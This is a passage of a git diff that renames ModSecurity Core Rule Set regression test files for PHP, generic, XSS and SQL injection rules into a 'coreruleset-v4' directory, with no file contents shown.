rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933170.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933180.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933190.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933200.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933210.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934101.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934130.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941101.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941110.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941130.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941140.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941150.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941160.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941170.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941200.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941210.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941220.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941230.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941250.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941290.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941320.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941330.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941340.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941350.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941370.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941380.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941390.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941400.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942100.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942150.yaml
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml
similarity index 100%
